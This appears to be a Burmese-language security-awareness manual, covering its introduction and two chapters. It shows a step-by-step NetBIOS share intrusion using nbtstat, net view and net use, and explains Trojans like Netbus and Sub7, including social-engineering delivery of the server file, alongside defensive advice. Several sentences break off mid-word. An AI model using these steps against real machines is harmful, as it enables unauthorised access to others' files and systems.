ံဟက်ကာများဧ။် လျှို့ဝှက်ချက် ကို ဖော်ထုတ်ခြင်းနှင့် မျှဝေခြင်း နိဒါန်း....
ဒါလေးက နိဒါန်းလေးပျိုးထားတာပါ။ နောက်ပိုစ့်ကစပြီး အခန်း ၁ ဖြစ်ပါလိမ့်မယ်။DISCLAIMER
The author of this manual will like to express my concerns about the misuse
of the information contained in this manual. By reading this manual you
agree to the following stipulations. Any actions and or activities related to the
material contained within this manual is solely your responsibility.
The misuse of the information in this manual can result in
criminal charges brought against the persons in question. The
authors will not be held responsible in the event any criminal
charges be brought against any individuals misusing the
information in this manual to break the law.
(Note This manual was created for Information purposes only.)
စကားဦး
နေ့စဉ်နဲ့အမျှ ကြီးထွားလာတဲ့ Internet ထဲမှာ ကျွှန်တော်နှင့် စာဖတ်သူတို့ဟာ ကြီးမားကျယ်ပြောလှတဲ့ သတင်းအချက်အလက် ပင်လယ်ပြင်ကြီးထဲက ရေပေါက်ငယ်လေးပမာပါပဲ။ ကိုယ်မသိတဲ့ကိစ္စက ကိုယ့်ကိုအမှုမပတ်နိုင်ဘူးလို့ ပြောကြပေမဲ့ အင်တာနက်နှင့်ပတ်သက်လာရင် ဒါကဆန့်ကျင်မှုတစ်ခုပါ။ အင်တာနက်ပေါ်မှာ သန်းပေါင်းများစွာသော ကွန်ပျုတာအသုံးပြုတွေဟာ ဝင်လိုက်ထွက်လိုက်ရှိနေပါတယ်။ သတင်းအချက်အလက်တွေဟာ ရွာကနေ မြို့အကွာအဝေးကို နှလုံးခုန်နှုန်းတစ်ချက်မှာ ပို့ပေးနေပါတယ်။
စာဖတ်သူလို သာမန်အသုံးပြုသူတွေ အတွက် မြန်ဆန်လှသော သတင်းအချက်အလက် လမ်းမကြီးပေါ်မှာ အန္တရာယ်များလှပါပေတယ်။ ၃၀ မှ ၄၀ ရာခိုင်နှုန်း အသုံးပြုသူတွေဟာ ကွန်ပျုတာတွေရဲ့ နောက်ကွယ်မှာ ဘာတွေအလုပ်လုပ်နေလဲဆိုတာ သတိမထားမိကြပါဘူး။ ကျန်တဲ့ အသုံးပြုသူတွေဟာ မိမိရဲ့ စနစ်ဟာ တိုက်ခိုက်ခြင်း၊ အသုံးပြုခံနေရခြင်းကို ရိုးသားစွာ ဂရုမစိုက်ခြင်း၊ သိရှိနိုင်သော အခြေခံအသိ မရှိကြပါဘူး
စာဖတ်သူဟာ မိမိရဲ့ အင်တာနက်ပေါ်မှ လွတ်လပ်ခွင့်ကို သိရှိလိုတဲ့အတွက် ဖတ်နေခြင်းလို့ယူဆပါသည်။ ဖြစ်လဲဖြစ်သင့်ပါသည်။ အင်တာနက်ပေါ်မှာ ဘယ်အရာမှ မိမိရဲ့ မျက်စိနဲ့မြင်ရာတဲ့တိုင်းဟာ မိမိမျက်စိနဲ့မြင်တဲ့အတိုင်းမဟု
မိမိသိတဲ့ အချက်အလက်ဟာ ဘယ်တော့မှ မလုံလောက်ပါဘူး သတင်းအချက်အလက်သည် စွမ်းအားဖြစ်သည်နှင့်အမျှ မိမိဟာသိရှိလေ အင်တာနက်ပေါ်က အတုအယောင်တွေကို ရှောင်နိုင်လေဖြစ်ပါလိမ့်မယ်။
ဒီလက်စွဲစာအုပ်မှာ ကျွှန်တော်ဟာ စာဖတ်သူကို စိုးရိမ်စေမဲ့ အကြောင်းအရာများကို တင်ပြသွားပါမယ်။ တစ်ချို့အရာတွေဟာ စာဖတ်သူကို ကွန်ပျုတာရှိခြင်းကို ထင်ယောင်ထင်မှား ဖြစ်ကောင်းဖြစ်စေ နိုင်ပါမယ်။ ဒါပေမဲ့ စိတ်ဓါတ်ကျစရာ မလိုပါဘူး ဘာဖြစ်လို့လဲဆိုတော့ ကျွှန်တော်စာရေးသူဟာ စာဖတ်သူ မိမိကိုယ်ကို ဘယ်လိုကွာကွယ်နိုင်တယ်ဆိုတာ ပြောပြသွားမှာပါ။
ဒာင်တာနက်ရဲ့ ဆိုးကျိုးတွေကို ပြောပြရခြင်းဟာ ကျွှန်တော်က စာဖတ်သူအတွက် ဘာအန္တရာယ်တွေရှိတယ်ဆိုတာ တင်ပြဖို့လိုအပ်တယ် ခံစားရလို့ပါ။
ကျွှန်တော်ဟာ ဒီလက်စွဲစာအုပ်ကို လမ်းပြအနေနှင့် ရေးခြင်းဖြစ်ပါတယ်။ စာဖတ်သူရဲ့ စနစ်တစ်ခုကို Hackers တွေဟာ ဘယ်လိုထိန်းချုပ်ခွင့်ရအောင် စနစ်ရဲ့အားနည်းချက်တွေ၊ Programs တွေသုံးပြီး ယူနိုင်လဲဆိုတာ ပြောပြခြင်းဖြစ်ပါတယ်။ ဒီလက်စွဲသည် အကုန်လုံးကို မတင်ပြနိုင်ပါ။ သို့သော်လည်း အခြေခံ နည်းများသိခြင်းဖြင့် အကယ်၍ စာဖတ်သူသည် Hackers တွေဘာတွေလုပ်လဲ ဘယ်လိုလုပ်လဲ သိရှိပါက မိမိကိုယ်ကို ကွာကွယ်နိုင်ရန် အနေအထားကောင်းတစ်ခုမှာ ရှိနိုင်ပါသည်။
စကားချပ် - ဒီစာအုပ်တစ်အုပ်လုံးတွင် Hacker ကို Reference စကားလုံးအနေနဲ့ သုံးစွဲသွားမှာဖြစ်ပါသည်။ Hacker များသည် မီဒီယာများဧ။် ရောင်းကောင်းသော စကားလုံးတစ်လုံးအနေဖြင့် အသုံးချခြင်းကြောင့် လူတွေသည် အထင်မှားလျက်ရှိပါသည်။ သို့ပါသော်လည်း Hacker ဆိုသောစကားလုံးကို စာရေးရာတွင်လွယ်ကူစေရန် အလို့ငှာ သုံးစွဲခြင်းသာဖြစ်ပါသည်။
အောက်ပါ အကြောင်းအရာများသည် တင်ပြသွားမဲ့ အကြောင်းအရာတွေက အနည်းငယ်ပါ။
Hackers တွေ ဘယ်လို စနစ်တစ်ခုလဲ ဝင်ရောက်လဲ
ဘယ်လို အရာတွေ အသုံးပြုလဲ
ဟက်ကာတစ်ယောက်ဟာ စာဖတ်သူဧ။် အိမ်ကို စာဖတ်သူဧ။် ကွန်ပျုတာမှ ဘယ်လိုစောင့်ကြည့်နိုင်ပုံ (မြန်မာပြည်ဧ။် Dial Up လိပ်နှုန်း နဲ့တော့မယုံချင်ဘူးထင်ပါတယ်။ ဒါပေမဲ့ ဘယ်လိုလုပ်နိုင်လဲဆိုတာ ပြောပြသွားပါမယ်။)
ဘယ်လို အချက်အလက်တွေကို အခွင့်ရှိပုံ နှင့် စာဖတ်သူဘာကြောင့် ကာကွယ်သင့်ပုံ
ဘယ်လို သတင်း နှင့် လှည့်ဖျားမှုများ အသုံးခြပုံ
Antivirus software တစ်ခုထဲနှင့် မလုံလောက်ပုံ
ဘာတွေကို ဂရုစိုက်ရမလဲ အကယ်၍ စာဖတ်သူဧ။် ကွန်ပျုတာသည် ကျုးကျော်ခံရပါက
ဘယ်လိုအကြောင်းပြချက်နဲ့မှ ကျွှန်တော်စာရေးသူသည် ဒီလက်စွဲသည် စာဖတ်သူကို အလုံးစုံကာကွယ်မှုပေးမယ်လို့ ရယ်ဖွယ်ကောင်းသော အာမခံချက်ကို မပေးပါ။ ကျွှန်တော် ပြောပြမဲ့ အကြောင်းအရာများကို လေ့လာပြီးတော့ စာဖတ်သူသည်မိမိကိုယ်ရေးအချက်
စာဖတ်သူသည် အင်တာနက်ကို ၂၄ နာရီ (သို့) ၁၅ မိနစ် ဆက်သွယ်ခြင်းဟာ မိမိဧ။်စနစ်အန္တရာယ်ရှိမှု မရှိမှုနှင့် မဆိုင်ပါ။ ၁၅မိနစ်တွင်းမှာပင် စာဖတ်သူဧ။် ကိုယ်ပိုင်စနစ်ကပင် စာဖတ်သူကို ဝင်ခွင့်ပိတ်ထားနိုင်ခြင်း၊ စာဖတ်သူဧ။် ဘဏ်အချက်အလက် ၊ ကိုယ်ပိုင်လိပ်စာများ ပါသွားနိုင်ပါသည်။
ကျွှန်တော်သည် စာဖတ်သူကို စိတ်ချောက်ချားအောင် ပြုလုပ်နေခြင်းမဟုတ်ပါ။ ကျွှန်တော်ပြောနေခြင်းသည် အကယ်၍ စာဖတ်သူဂရုမစိုက်ပါက စာဖတ်သူကိုယ်တိုင်ပင် အန္တရာယ်ကို တံခါးဖွင့်ပေးသလိုပါပဲ။ စာဖတ်သူသည် ကျွှန်တော့်ကို အထင်အလွဲကောင်းလွဲနိုင်ပါသည်။ ကျွှန်တော့်ကို စာဖတ်သူသည် စာဖတ်သူသည် Email စစ်ခြင်းနှင့် Chat ခြင်းကလွဲရင် ဘာမှမလုပ်တဲ့အတွက် ဒါတွေမဖြစ်နိုင်ပါဘူးလို့ ပြောဆိုကောင်းပြောဆိုပါလိမ့်မယ်
ဟက်ကာများဧ။် လျှို့ဝှက်ချက် ကို ဖော်ထုတ်ခြင်းနှင့် မျှဝေခြင်း (၁)....
အခန်း ၁ (ကွန်ပျုတာကို ၁၅ စက္ကန့် အတွင်းထိုးဖောက်ခြင်း)
ကွန်ပျုတာကို ၁၅ စက္ကန့် အတွင်းထိုးဖောက်ခြင်း…
မှန်ပါသည်။ လုပ်လို့ရပါတယ်။ အကယ်၍စာဖတ်သူဧ။် စနစ်သည် တိကျသော လုံခြုံရေးအားနည်းချက်များ ရှိပါက ၁၅ စက္ကန့်ပိုင်းအတွင်းပင် ချိုးဖောက်ခံနိုင်ရပါသည်။
ဒီအခန်းကိုစတင်ဖို့အတွက် ကျွှန်တော်စာဖတ်သူကို လုပ်ခိုင်းစရာတစ်ချို့ရှိပါသည်။ အကယ်၍စာဖတ်သူသည် Dial Up အသုံးပြုပါက ချိတ်ဆက်ဖို့လိုပါလိမ့်မယ်။ DSL (သို့) Cable သုံးပါက ဒီအဆင့်ကိုတခါတည်း ပြုလုပ်နိုင်ပါသည်။
Windows 2000 ထိ OS များအတွက်
• Start Menu ကိုနှိပ်ပါ
• Run ကိုရှာပြီး နှိပ်ပါ
• Winipcfg ကို Box ထဲတွင် ရိုက်ထဲ့ပြီး Enter နှိပ်ပါ
• ဒီ Windows လေးကို မြင်တွေ့ရပါမယ်

Windows XP အထက် OS များအတွက်
• Start Menu ကိုနှိပ်ပါ
• Run ကိုရှာပြီး နှိပ်ပါ
• cmd ကို Box ထဲတွင် ရိုက်ထဲ့လိုက်ပါ

• Console ပေါ်လာသောအခါ ipconfig ဆိုပြီးရိုက်ပါ (သို့) Network နဲ့ပတ်သက်တဲ့ အချက်အလက်အကုန်တွေ့ချင်ပါက ipconfig /all ရိုက်လို့လဲရပါတယ်
• ဒီအဆင့်ကိုမြင်တွေ့ရပါမယ်

* For editorial reason the above info has been omitted *
IP Add နေရာမှာ မြင်ရမှာတွေကတော့ ဒီလိုမျိုးဂဏန်းတွေပါ။ 207.66.55.1 (ကွဲပြားနိုင်ပါသည်။)
အကယ်၍ Dial Up အသုံးပြုပါက IP add ကို PPP Adapter အောက်မှာရှာတွေ့မှာပါ။ အကယ်၍ တစ်ခြားနည်းလမ်းများကို အသုံးပြုဆက်သွယ်ပါက IP add တွေကို တစ်ခြား Adapter Name တွေအောက်မှာ ရှာတွေ့မှာဖြစ်မှာပါ။ List တွေကို ဖော်ပြထားသော မြှားနေရာကို နှိပ်ခြင်းဖြင့် ထပ်တွေ့နိုင်ပါမယ်။

IP Add ကိုသိသောအခါမှာ နောက်ထပ် Console တစ်ခုကိုထပ်ဖွင့်ပြီး Console ထဲမှာ ဒါကိုရိုက်ထဲ့ရမှာပါ။
Nbtstat –A ip add (ဥပမာ nbtstat –A 207.66.55.1) ဒီနေရာမှာတော့ A သည် Capital Letter ဖြစ်ရပါမယ်။ nbtstat commands များကို ထပ်သိချင်တယ်ဆိုရင် ဒါကို ရိုက်ပြီးလေ့လာနိုင်ပါသည်။ nbtstat /help
ဒီလိုပုံစံ Output လေးကိုတွေ့ရမှာပါ။
NetBIOS Remote Machine Name Table
______________________________ ______
Name Type Status
------------------------------ -------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01> GROUP Registered
(Again info has been omitted due to privacy reasons)
< > ထဲမှာရှိတဲ့ ဂဏန်းတွေဟာ Hex Code တန်ဖိုးတွေဖြစ်ပါတယ်။ ဒါပေမဲ့ ဒီမှာ ကျွှန်တော်စိတ်ဝင်စားတာက <20> တန်ဖိုးပါတဲ့ Hex code ပါ။ အကယ်၍ 20 ကိုမတွေ့ရင်တော့ ဒါစာဖတ်သူအတွက် သတင်းကောင်းပါပဲ။ မဟုတ်ရင်တော့ စာဖတ်သူ စဉ်းစားစရာတွေ ရှိလာပါလိမ့်မယ်။ ကျွှန်တော်ရေးသားကိုဖတ်ပြီး စာဖတ်သူနားရှုပ်သွားနိုင်ပါတယ်။
ကဲ ရှင်းပြပါရစေ။ <20> ဆိုသည်မှာ စာဖတ်သူဧ။် ကွန်ပျုတာမှာ File and Printer Sharing ကိုဖွင့်ပေးထားလို့ပဲ ဖြစ်ပါသည်။ ဒါက ဟက်ကာတစ်ယောက်က စာဖတ်သူ ကွန်ပျုတာဟာ File and Printer Sharing ကိုဖွင့်ပေးထားလား သိချင်ရင် လုပ်မဲ့ အဆင့်တွေပါ။ အကယ်၍ ဖွင့်ပေးထားတယ်ဆိုတာကို သိရှိပါက ဟက်ကာတွေက စနစ်ကိုထိန်းချုပ်ခွင့်ရရန် ဆက်လုပ်သွားမှာပါ။
Note : Console ကထွက်ရန် Exit လို့ရိုက်ပြီး Enter နှိပ်ထွက်နိုင်ပါသည်။
အထက်ပါ အချက်အလက်တွေကိုသုံးပြီး ဘယ်လိုထိန်းချုပ်ခွင့်ရအောင် လုပ်နိုင်လဲဆိုတာ ဒီနေရာကစပြီး ကျွှန်တော်ရှင်းပြသွားပါမယ်။
အလားအလာရှိတဲ့ ဟက်ကာတစ်ယောက်ဟာ IP Add အစုတစ်ခုကို Scan လုပ်ပြီး File and Printer Sharing ကွန်ပျုတာစနစ်တွေကို ရှာဖွေမှာပါ။ တွေ့ရှိတာနဲ့ချက်ခြင်း ဘာတွေစက်ပေါ်မှာ မျှဝေထားလဲဆိုတာကို ဒီလိုကြည့်ရှုနိုင်ပါသည်။ ဘယ်လိုလဲဆိုတော့ net view \\
ထို့နောက် ဒီလိုပုံစံကိုရရှိမှာပါ။
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
ဒါက ဟက်ကာကို ဘာဖော်ပြလဲဆိုတော့ သူ့ရဲ့အလားအလာရှိတဲ့ သားကောင်ဟာ သူဧ။် My Documents နှင့် Temp ဆိုတဲ့ Folders နှစ်ခုကို ကွန်ယက်ပေါ်မှာ မျှဝေထားပါတယ်။ ထိုအထက်ပါအရာတွေကို လုပ်ပိုင်ခွင့်ရရှိရန် ဟက်ကာသည် ဒီ command ကို အသုံးချသွားမှာပါ။
Net use x: \\\temp
Folder သည် စကားဝှက်သို့ ခံထားခြင်းမရှိပါက ဟက်ကာသည် လွယ်လွယ်ကူကူပင် ဝင်ခွင့်ရှိသွားမှာဖြစ်ပါသည်။ ဒီမှာ ကျွှန်တော်မေးချင်တာက ဒါတွေကိုပြုလုပ်ရန် ဘယ်လောက်များကြာနိုင်ခဲ့လို့လဲ။ စာဖတ်သူဧ။် အဖြေကကော...
အကြာကြီးတော့ မဟုတ်လောက်ပါဘူး။ ဟုတ်တယ်ဟုတ်။ စာဖတ်သူတို့ ဘယ်နှစ်ယောက်များက File and Printer Sharing အကြောင်းမသိပဲနဲ့ ဖွင့်ထားမိပါလဲ။
ဟုတ်ကဲ့ Ladies and Gentlemen။ ဒါကို Netbios Attack လို့ခေါ်ပါတယ်။ အကယ်၍ မိမိအိမ်တွင် အိမ်တွင်းကွန်ရက် ချိတ်ဆက်ထားရင် ဖြစ်နိုင်တာက စာဖတ်သူဟာ File and Printer Sharing ကိုဖွင့်ထားနိုင်ပါသည်။ စာဖတ်သူအကုန်လုံးဟာ ဒီလိုလုပ်ထားတယ်လို့ ကျွှန်တော်မဆိုလိုပါ။ ဒါပေမဲ့ လုပ်တဲ့လူတွေအများကြီးပါ။ အကယ်၍ မိမိသည် ကွန်ရက်ပေါ်မှာ အရင်းအမြစ်တွေကို မျှဝေထားတယ်ဆိုရင် Directory များကို စကားဝှက်ဖြင့် ကာကွယ်ထားရန အကြံပေးပါရစေ။ မိမိသည် ကွန်ရက်ပေါ်မှာ မျှဝေထားသော Directory မှန်သမျှ ဒီလိုပုံစံ မျိုး Icon လေးကို တွေ့ရှိရမှာပါ။
မိမိဧ။် ကွန်ပျုတာမှ မျှဝေထားသော အရင်းအမြစ်များကို ရှာဖွေရန် ဒီအဆင့်များပြုလုပ်နိုင်ပါသည်။
Console ကို ဖွင့်လိုက်ပါ။ မသိရင် အပေါ်မှာ ပြန်ရှာဖတ်ကြည့်ပါ။ Console ထဲကို ရောက်သာအခါ net share ဆိုပြီး ရိုက်ကြည့်ပါ။ net share command သည် မိမိ မျှဝေထားသော အရာများကို နာမည်နှင့် နေရာပါ ပြသနိုင်ပါသည်။ မျှဝေထားသော အရာတွေထဲက $ sign ပါသော အရာများသည် Administrative Shares များဖြစ်ပါသည်။ တော်တော်များများကို Windows သည် သူ့ဘာသာသူ Administrative Shares များအဖြစ်သတ်မှတ်ထားပါသည်။ ပြင်ဆင်ချင်ပါက သေချာအရင် လေ့လာစေချင်ပါသည်။
Netbios သည်ရှေးကျသော စနစ်ကျုးကျော်သော နည်းလမ်းတစ်ခုဖြစ်ပါသည်။ စနစ်များစွာသည် ပုံမှန် ကာကွယ်ပေးထားသဖြင့် တစ်ချို့သည် သတိမမူမိပဲ သေချာကာကွယ်မှု အတ်ုင်းအဆများ မလုပ်မိသောကြောင့် နောက်ပိုင်းတွင် Netbios Attack သည် လုပ်ခံရသော သားကောင်များ ပြန်လည်မြင့်မားလာရသည်။
ဒီစာအုပ်နောက်ပိုင်းတွင် အခြေခံကာကွယ်နည်းအချို့ကို ရေးသားသွားပါမည်။ ဒီနေရာထိတိုင်အောင် အလားအလာရှိသော အားနည်းချက်များကို ရေးသားရန် စိတ်အားသန်နေပါသဖြင့် စောင့်ဖတ်ရန် ပြောကြားလိုပါသည်။

______________________________
Name Type Status
------------------------------

ဟက်ကာများဧ။် လျှို့ဝှက်ချက် ကို ဖော်ထုတ်ခြင်းနှင့် မျှဝေခြင်း (၂)....
အခန်း ၂ (Trojan Horse (လျှို့ဝှက်ဝင်လာသော ရန်သူ့လက်ပါးစေ))ကျွှန်တော် Trojan Horse ရဲ့ ကွန်ပျုတာနှင့်မသက်ဆိုင်သော သမိုင်းဇာတ်လမ်းလေးကို အစကမပြောမလို့ပဲ။ လူတိုင်းသိတယ်ထင်လို့ပါ။ ဒါပေမဲ့ မသိတဲ့လူတွေရှိရင် ဒါလေးသိရင် ပိုပြီးနားလည်မယ်ထင်လို့ ထည့်ရေးလိုက်တာပါ။
ဒါက Trojan War လို့ခေါ်တဲ့ Greek နှင့် Troy ၁၀ နှစ်ကြာ စစ်ပွဲမှာ Troy တွေရဲ့ ၁၀ နှစ်ကြာအဝိုင်းခံနေရတဲ့ Greek ကသူ့မြို့ကို စွန့်ခွါသွားတဲ့ ပုံစံနှင့် ဟန်ဆောင်ပြီး ဂရိစစ်သည်အချို့ကို ကြီးမားတဲ့ မြင်းရုပ်ကြီးထဲထည့်ပြီး ထားခဲ့ပါတယ်။ Troy တွေက စစ်အောင်တဲ့ အထိမ်းအမှတ်နဲ့ မြင်းရုပ်ကြီး သူတို့မြို့ကြီးထဲ သွင်းခဲ့တယ်။ ညကျတော့မှ စစ်သည်တွေဟာ ထွက်လာပြီး ဂရိမြို့တံခါးကိုဖွင့်ပြီး တိတ်တဆိတ်ပြန်လာတဲ့ ဂရိစစ်တပ်အတွက် တံခါးဖွင့်ပေးခဲ့ပါတယ်။ ထို့နောက် Troy တွေရဲ့ ဝိုင်းခံထားရတဲ့ ဂရိတွေဟာ စစ်ပွဲကို ပြီးဆုံးယုံတာမက Troy တွေကို ချေမှုန်းနိုင်ခဲ့ပါတယ်။ ဒီမှာ လှည့်စားမှုက မြင်းရုပ်ပါ။ ဒီ Trojan Horse ရုပ်ထုကိုတာ Troy တွေသူတို့မြို့ထဲ မသွင်းခဲ့ရင် Troy တွေအနိုင်ရနိုင်မှာပါ။ ဒါပေမဲ့ သူတို့ရဲ့ အားနည်းမှုကို သူတို့ဘာသာဖွင့်ပေးအောင် ထောင်ချောက်ဆင်ခဲ့နိုင်ပါတယ်။ ဘယ်လောက်လှပတဲ့ လုံခြုံရေးအားနည်းချက်ကို မိမိကိုယ်တိုင်ဝင်ခွင့်ပေးအောင်
ဒီလိုပါပဲ။ ကွန်ပျုတာစနစ်တော်တော်များများ
Trojan ဆိုတာ ဟက်ကာတွေကို စာဖတ်သူဧ။် ကွန်ပျုတာကို လုံးဝထိန်းချုပ်နိုင်ခွင့်ပေးတဲ
Trojans တွေလုပ်ဆောင်ပေးနိုင်တဲ့ အဓိကထင်ရှားတဲ့ လုပ်ငန်း ၆ ရပ်က
[list=1]
Remote Accessing (မိမိဧ။်ကွန်ပျုတာကို တစ်ခြားအသုံးပြုသူအတွက် အဝေးတစ်နေရာမှ အသုံးချနိုင်အောင်ပြုလုပ်ပေြး
Data Destruction (အချက်အလက်များ ဖျက်ဆီးပစ်ခြင်း)
Downloader (မိမိဧ။် ကွန်ပျုတာပေါ်မှ အချက်အလက်များကို တစ်ခြားတစ်နေရာသို့ ပေးပို့နိုင်ရင် ကူညီပေးခြင်း) မှတ်ချက် - သားကောင်ဖက်ဆိုရင် Uploader သဘောဖြစ်ပြီး၊ ဟက်ကာဖက်က Downloader သဘောပါ။
Server Trojan (Proxy, FTP , IRC, Email, HTTP/HTTPS, etc.)
Security Software Disabler (မိမိဧ။် ကွန်ပျုတာပေါ်မှာ လုံခြုံရေးအတိုင်းအတာများကို အလုပ်မလုပ်ရန်ပြုလုပ်ခြင်း)
Denial of Service attack (DoS) (မိမိဧ။် ကွန်ပျုတာမှ တစ်ခြား ကွန်ရက်ပေါ်မှ ကွန်ပျုတာများကို DoS attack ဖြင့်တိုက်ခိုက်ခြင်း) မှတ်ချက် - ဟက်ကာတစ်ယောက်ဟာ သူဧ။် ထိန်းချုပ်မှုအောက်မှ သားကောင်များကိုအသုံးပြု၍ တစ်ခြားကွန်ရက်ကို တိုက်ခိုက်ရာတွင် အသုံးပြုပါသည်။ BotNet Attack ခေါ်တဲ့ နေရာမှာ အသုံးချပါတယ်။ Grid Computing ဆိုတဲ့ နည်းပညာကလာတဲ့ အတွေးအခေါ်လေးတစ်ခုပါ။ Grid Computing ဆိုတာ ကွန်ရက်နှင့် ချိတ်ဆက်ထားသော ကွန်ပျုတာများဧ။် စွမ်းရည်ကို ဝေငှသုံးစွဲ၍ လုပ်ငန်းများကို စွမ်းအင်မြင့်မြင့် လုပ်ဆောင်ခြင်းဖြစ်ပါသည်။ ကျွှန်တော့်ဆီမှာ Distribute Password ဖေါ်တဲ့ Software ဟာ ဒီလိုမျိုးလုပ်ပေးပါတယ်။
ထင်ရှားတဲ့ ပျက်စီးမှုတွေကတော့ လုပ်ပေးနိုင်တာကတော့ အောက်ပါထဲက တစ်ချို့ဖြစ်ပါတယ်။
[list=1]
ကွန်ပျုတာပေါ်က ဒေတာတွေကို ဖျက်ပစ်ခြင်း၊ အပေါ်ကနေ ထပ်ရေးခြင်း
အသုံးပြုတူက သိရှိ၍ Trojan ဖျက်ပစ်ပါက ထပ်ပြီး Trojan ကို ပြန်သွင်းခြင်း
ဖိုင်တွေကို cryptoviral extortion attack လို့ခေါ်တဲ့ နည်းပညာဖြင့် (Encrypt) ဝှက်စာပြုလုပ်ခြင်း။ ဒါကဘာလဲဆိုတော့ Trojan ရေးတဲ့ ကိုယ်တိုင်လူမှ ဒါမှမဟုတ် ဒီ Attack ကိုလုပ်တဲ့ လူကသာပြန် Decrypt လုပ်နိုင်ခြင်းပါ။ နောက်ပိုင်း Backdoor ပြုလုပ်တဲ့နည်းလမ်းကို ဒီနည်းပညာနဲ့အဆင့်မြှင့် ထားပါတယ်။ ဘာထူးခြားလဲဆိုတော့ Trojan ကနေ Backdoor ကိုဖွင့်ပေးထားတဲ့ Port ကို တိုက်ခိုက်တဲ့လူကလွဲရင် သုံးလို့မရပါဘူး တစ်ယောက်ကတွေ့ရှိခဲ့ရင်တောင် ဘယ်လိုမှကာကွယ်၊ ဖယ်ရှား၊ စစ်ဆေးလို့မရပါဘူး။
နောက်ထပ် Adware, Spyware, and Viruses များကို အလွယ်တကူသွင်းလို့ရအောင် ကူညီပါတယ်။
Keylogger အနေဖြင့် အသုံးချခြင်း (keylogger ဆိုသည်မှာ စာဖတ်သူရိုက်လိုက်တဲ့ keystrokes တွေကို Hacker ဆီပို့ပေးခြင်း) အထင်မသေးပါနဲ့ ဒီနည်းနဲ့ စာဖတ်သူဧ။် Bank Info၊ Personal Life တွေပါသွားနိုင်ပါသည်။
Phising ပြုလုပ်ခြင်း (စာဖတ်သူကိုလည်းကောင်း၊ စာဖတ်သူ IP ကိုအသုံးပြု၍ တစ်ခြားသားကောင်များကို လှည့်ဖြားရာတွင် အကာအကွယ်ပြုလုပ်ခြင်း)
DDoS attack တွင် စာဖတ်သူဧ။် စက်ကို Zombie အနေနှင့်အသုံးခြခြင်း
Fake Email Accounts များ၊ Email Servers များ စာဖတ်သူဧ။် စက်ပေါ်တွင် တည်ဆောက်ခြင်း (သို့) စာဖတ်သူဧ။် Email Account ကိုအသုံးပြု၍ Spam များပို့ဆောင်ခြင်းတို့ ဖြစ်ပါသည်။
ဒါတွေကို ထပ်သိချင်ရင်တော့ Wiki မှာသွားကြည့်ပါ။ ဒါတွေက နည်းနည်းသစ်တာနဲ့ အဓိကအချက်တွေကို ရေးထားသာပါ။
အထင်ရှားဆုံးထဲက Trojans တွေထဲက နှစ်ခုကတော့ Netbus နှင့် Sub7 တို့ဖြစ်ပါတယ်။ Trojans တိုင်းကဲ့သို့ Netbus မှာ နှစ်ပိုင်းပါဝင်ပါတယ်။ Client နှင့် Server အပိုင်းပဲဖြစ်ပါတယ်။ Server အပိုင်းကတော့ စာဖတ်သူရဲ့ စက်ကို သုံးစွဲရန် ဟက်ကာက စာဖက်သူစက်ပေါ်မှာ သွင်းပေးရတဲ့ Program ပါ။ ထိုသို့ပြုလုပ်ရန် ဟက်ကာတစ်ယောက်က ဘယ်လိုချိုးဖောက်မလဲဆိုတော့
ချိုးဖောက်ခြင်း
ရည်မှန်းချက် : အလားအလာရှိတဲ့ သားကောင်ကို ရွေးချယ်၍ Server ကို သားကောင်ကိုယ်တိုင် သားကောင်ဧ။်စက်ပေါ်တွင် သွင်းစေရန်ကြိုးစားခြင်း
နည်းလမ်း ၁
Server file (ဥပမာ အားဖြင့် netbuserver.exe ဟုကျွှန်တော် ဒီမှာ ခေါ်ဆိုပါမည်) ကို စာဖတ်သူဧ။် email သို့ပေးပို့ခြင်း။ ဒီနည်းဟာ ရှေးအကျဆုံးနည်းပါ။ ဒါပေမဲ့ ဒါကို သတိမမူလို့ ထောင်ချက်ထဲကျလာတဲ့ သားကောင်တွေ ခုထက်ထိ မနည်းပါဘူး။ ဒီလိုလေး လွယ်လွယ်လေးလုပ်နိုင်ပါသည်။ ဟက်ကာသည် အထက်ပါ file ကို Game File ဟုဆို၍လည်းကောင်း၊ ပျော်စရာ File တစ်ခုဟု ပြောဆိုကာ ပေးပို့လိုက်ပါမယ်။ ဒါပေမဲ့ ဘာမှမပေါ်လာပါဘူး စာရေးသူ ဖွင့်ကြည့်သောအခါ။ (သံသရ ဖြစ်စရာပါပဲ )
စာရေးသူ ဒီလိုမျိုး ကိုယ်မသိတဲ့ File ကိုမသိပဲနဲ့ Double Click လုပ်ပြီး ဖွင့်ကြည့်ပြီးတော့ ဘာမှမမြင်ရတာ ဘယ်နှစ်ကြိမ်ရှိလဲ စဉ်းစားကြည့်ပါ။
ဒီအချိန်မှာ ဘာဖြစ်ခဲ့လဲဆိုတော့ Server ဆိုတဲ့ File ကို စာဖတ်သူဧ။် စနစ်ပေါ်မှာ သွင်းပြီးသွားပြီ ဖြစ်ပါတယ်။ နောက်ထပ် လုပ်စရာလိုတာကတော့ Client ဆိုတဲ့ File ကို ဟက်ကာကနေ Run လိုက်ပြီး စာဖတ်သူဧ။် စနစ်ကို ဆက်သွယ်ရုံပါပဲ။ ဒီအချိန်ကစပြီး စာဖတ်သူဧ။် စနစ်ကို စာဖတ်သူဧ။် ကွန်ပျုတာရှေ့မှာ ထိုင်သုံးကဲ့သို့ပါပဲ။
ဒီလိုမျိုး လုပ်တာများလာလို့ လူတွေသတိထားမိလာသောအခါ အရမ်းကို ညဏ်စူးရှတဲ့ ဟက်ကာတွေက ဒုတိယနည်းလမ်းကို ပြောင်းသုံးကြပါတယ်။
နည်းလမ်း ၂
စာဖတ်သူဟာ စာဖတ်သူရဲ့ သူငယ်ချင်းဆီက ဆိုပြီး Flash Games တွေဘာတွေ ဘယ်နှစ်ခါရဘူးပါလဲ။ Saddam ကို ဗုံးကြဲတာတို့ Osama Bin Ladin ကို သေနတ်နဲ့ပစ်တာတို့ ဘာတို့ပါ။ Script တွေပါတဲ့ Power Point File တို့ပေါ့။ ဒီလိုမျိုးဟာတွေ ကိုသုံးပြီး စာဖတ်သူဧ။် စက်ကိုထိန်းချုပ်ခွင့်ရရန် ကြိုးစားနိုင်ပါသည်။
